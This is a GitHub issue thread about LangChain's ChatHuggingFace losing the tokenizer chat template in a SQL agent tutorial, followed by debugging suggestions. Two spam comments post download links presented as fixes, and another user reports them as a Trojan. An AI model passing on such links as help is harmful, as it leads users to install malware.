### ISSUE TITLE
Tutorial is not working with local model (e.g Llama3) due to chat template 

### ISSUE THREAD

**Issue by NourOM02** [langchain-ai/langchain#26656]
### URL

https://python.langchain.com/docs/tutorials/sql_qa/

### Checklist

- [x] I added a very descriptive title to this issue.
- [X] I included a link to the documentation page I am referring to (if applicable).

## Goal
Create a SQL agent that ineracts with a SQL database using a local model.

## My implementation
I am trying to use a local model from huggingface and then create a ChatModel instance using ChatHuggingFace class. I implemented the same code for the agent as explained in the above tutorial, with the necessary changes to work with a huggingface model.

#### Configuring LangSmith and HuggingFace tokens
```Python
import os
os.environ["LANGCHAIN_TRACING_V2"] = "true"
os.environ["LANGCHAIN_API_KEY"] = ""
os.environ["HF_TOKEN"] = ""
```
#### Needed packages
```Python
# Packages required to load the model
from transformers import BitsAndBytesConfig
from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline
from accelerate import FullyShardedDataParallelPlugin, Accelerator
from torch.distributed.fsdp.fully_sharded_data_parallel import FullOptimStateDictConfig, FullStateDictConfig

# Packages required to set SQL agent with langchain
from langchain_community.utilities import SQLDatabase
from langchain_huggingface import ChatHuggingFace, HuggingFacePipeline
from langchain_community.agent_toolkits import SQLDatabaseToolkit
from langchain_core.messages import SystemMessage, HumanMessage
from langgraph.prebuilt import create_react_agent
```
#### Setup the connection to the database
```Python
db = SQLDatabase.from_uri("sqlite:///Chinook.db")
```
#### Setup the LLM
```Python
# Model to use
model_id = "google/gemma-2-2b-it"

# Quantization Configuration:
quantization_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype="float16",
    bnb_4bit_use_double_quant=True,
)

fsdp_plugin = FullyShardedDataParallelPlugin(
    state_dict_config=FullStateDictConfig(offload_to_cpu=True, rank0_only=False),
    optim_state_dict_config=FullOptimStateDictConfig(offload_to_cpu=True, rank0_only=False),
)

accelerator = Accelerator(fsdp_plugin=fsdp_plugin)

tokenizer = AutoTokenizer.from_pretrained(model_id)

model = AutoModelForCausalLM.from_pretrained(
    model_id,
    quantization_config=quantization_config,
    device_map="auto",
    trust_remote_code=True,
    torch_dtype="auto"
)
```
Build hugging face pipeline to use the model with the langchain package
```Python
pipe = pipeline("text-generation", model=model, tokenizer=tokenizer, max_new_tokens=100, top_k=50)
llm = HuggingFacePipeline(pipeline=pipe)
llm = ChatHuggingFace(llm=llm)
```
#### Create Agent
```Python

toolkit = SQLDatabaseToolkit(db=db, llm=llm)
tools = toolkit.get_tools()

SQL_PREFIX = """You are an agent designed to interact with a SQL database.
Given an input question, create a syntactically correct SQLite query to run, then look at the results of the query and return the answer.
Unless the user specifies a specific number of examples they wish to obtain, always limit your query to at most 5 results.
You can order the results by a relevant column to return the most interesting examples in the database.
Never query for all the columns from a specific table, only ask for the relevant columns given the question.
You have access to tools for interacting with the database.
Only use the below tools. Only use the information returned by the below tools to construct your final answer.
You MUST double check your query before executing it. If you get an error while executing a query, rewrite the query and try again.

DO NOT make any DML statements (INSERT, UPDATE, DELETE, DROP etc.) to the database.

To start you should ALWAYS look at the tables in the database to see what you can query.
Do NOT skip this step.
Then you should query the schema of the most relevant tables."""

system_message = SystemMessage(content=SQL_PREFIX)

agent_executor = create_react_agent(llm, tools, state_modifier=system_message)

```
#### Run the agent
```Python
for s in agent_executor.stream(
    {"messages": [HumanMessage(content="Which country's customers spent the most?")]}
):
    print(s)
    print("----")
```
## Expected behaviour
As demonstrated by the tutorial, steps taken by the LLM should be displayed before getting the final answer.

## Actual behaviour
**ValueError:** Cannot use apply_chat_template() because tokenizer.chat_template is not set and no template argument was passed! For information about writing templates and setting the tokenizer.chat_template attribute, please see the documentation at https://huggingface.co/docs/transformers/main/en/chat_templating

## Additional experiments
I tried to visualize the chat_template in the loaded model using : 
```Python
tokenizer.chat_template
```
I get the following template (which means everything is good):
"{{ bos_token }}{% if messages[0]['role'] == 'system' %}{{ raise_exception('System role not supported') }}{% endif %}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if (message['role'] == 'assistant') %}{% set role = 'model' %}{% else %}{% set role = message['role'] %}{% endif %}{{ '<start_of_turn>' + role + '\n' + message['content'] | trim + '<end_of_turn>\n' }}{% endfor %}{% if add_generation_prompt %}{{'<start_of_turn>model\n'}}{% endif %}"

However, when I try to access the chat template after intializing ChatHuggingFace I notice that there is no chat_template, using : 
```Python
llm.tokenizer.chat_template
```

My conclusion is there is a problem with `ChatHuggingFace` that makes the `chat_template` missing !

**Comment by odoyhaha** [comment]
try this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw

you may need to install the c compiler

**Comment by Trung0246** [comment]
> try this https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
> 
> you may need to install the c compiler

That link contains Trojan. https://www.virustotal.com/gui/file/0f1c03a048c41ed563116d7c4f5add033f19fa71b5f74bc520a2928e3ddc977d

**Comment by Felipe-Rafael-Rosa** [comment]
I think this will help you.
https://bit.ly/4evXrQ6

you may need to install the c compiler

**Comment by Trung0246** [comment]
> I think this will help you. https://bit.ly/4evXrQ6
> 
> you may need to install the c compiler

https://www.virustotal.com/gui/url/9fb15e5631759088f029d701d36d3de48c6460f2b3ba2f893df4200d4a11c5d4?nocache=1

**Comment by tibor-reiss** [comment]
Could you please try `llm = ChatHuggingFace(llm=llm, tokenizer=llm.pipeline.tokenizer)`?

**Comment by tibor-reiss** [comment]
FYI: updated the docs for easier debugging in https://github.com/huggingface/transformers/pull/33652

**Comment by tibor-reiss** [comment]
google/gemma-2-2b-it does not support system calls: "Template error: syntax error: System role not supported"

I also tried other models (e.g. meta-llama), and other methods (e.g. HuggingFaceEndpoint), and they work with ChatHuggingFace.

At this point it seems to me like a model problem, and I would recommend that you provide a MRE, preferably with a model which works / used to work with some early version.

Imho, the original issue (chat_template) raised seems to be resolved.

**Comment by Arslan-Mehmood1** [comment]
How to resolve?
ERROR:
```
Traceback (most recent call last):
  File "/home/paperspace/Ahmer/privatellm/src/2.py", line 50, in <module>
    ai_msg = hf_text_model.invoke(messages)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/langchain_core/language_models/chat_models.py", line 286, in invoke
    self.generate_prompt(
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/langchain_core/language_models/chat_models.py", line 786, in generate_prompt
    return self.generate(prompt_messages, stop=stop, callbacks=callbacks, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/langchain_core/language_models/chat_models.py", line 643, in generate
    raise e
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/langchain_core/language_models/chat_models.py", line 633, in generate
    self._generate_with_cache(
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/langchain_core/language_models/chat_models.py", line 851, in _generate_with_cache
    result = self._generate(
             ^^^^^^^^^^^^^^^
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/langchain_huggingface/chat_models/huggingface.py", line 373, in _generate
    llm_input = self._to_chat_prompt(messages)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/langchain_huggingface/chat_models/huggingface.py", line 410, in _to_chat_prompt
    return self.tokenizer.apply_chat_template(
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/transformers/tokenization_utils_base.py", line 1617, in apply_chat_template
    chat_template = self.get_chat_template(chat_template, tools)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/paperspace/.virtualenvs/privatellm/lib/python3.11/site-packages/transformers/tokenization_utils_base.py", line 1785, in get_chat_template
    raise ValueError(
ValueError: Cannot use chat template functions because tokenizer.chat_template is not set and no template argument was passed! For information about writing templates and setting the tokenizer.chat_template attribute, please see the documentation at https://huggingface.co/docs/transformers/main/en/chat_templating
```

Chat Template:
```
Loading checkpoint shards: 100%|████████████████████████████████████████████████████████████████████| 2/2 [00:01<00:00,  1.06it/s]
Device set to use cuda:0
hf_pipe_llm.pipeline.tokenizer.chat_template -----------
None
hf_pipe_llm.pipeline.tokenizer.chat_template -----------
hf_text_model.tokenizer.chat_template-----------
None
hf_text_model.tokenizer.chat_template-----------
```

```
import torch
from transformers import pipeline
from transformers import AutoModelForCausalLM, AutoTokenizer
from langchain_huggingface import ChatHuggingFace, HuggingFacePipeline

model_id = "meta-llama/Llama-3.2-3B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id)

pipe = pipeline("text-generation", model=model, tokenizer=tokenizer)
# transformers_llm_pipeline = pipeline("text-generation", model_id)

hf_pipe_llm = HuggingFacePipeline(
    pipeline=pipe
)
# hf_pipe_llm = HuggingFacePipeline.from_model_id(
#     model_id = model_id,
#     task = "text-generation",
#     device_map = 'cuda'
# )
tokenizer = AutoTokenizer.from_pretrained(model_id)

print("hf_pipe_llm.pipeline.tokenizer.chat_template -----------")
print(hf_pipe_llm.pipeline.tokenizer.chat_template)
print("hf_pipe_llm.pipeline.tokenizer.chat_template -----------")


hf_text_model = ChatHuggingFace(
    llm = hf_pipe_llm,
    model_id = model_id,
    tokenizer = tokenizer
)

print("hf_text_model.tokenizer.chat_template-----------")
print(hf_text_model.tokenizer.chat_template)
print("hf_text_model.tokenizer.chat_template-----------")

from langchain_core.messages import (
    HumanMessage,
    SystemMessage,
)

messages = [
    SystemMessage(content="You're a helpful assistant"),
    HumanMessage(
        content="What happens when an unstoppable force meets an immovable object?"
    )
]

# ai_msg = hf_text_model.invoke(messages)
# print(ai_msg)

```

**Comment by NourOM02** [comment]
The problem is that you are using a model which is not prepared for chatting, therefore it doesn't have a chat template by default. Use `meta-llama/Llama-3.2-3B-Instruct` instead
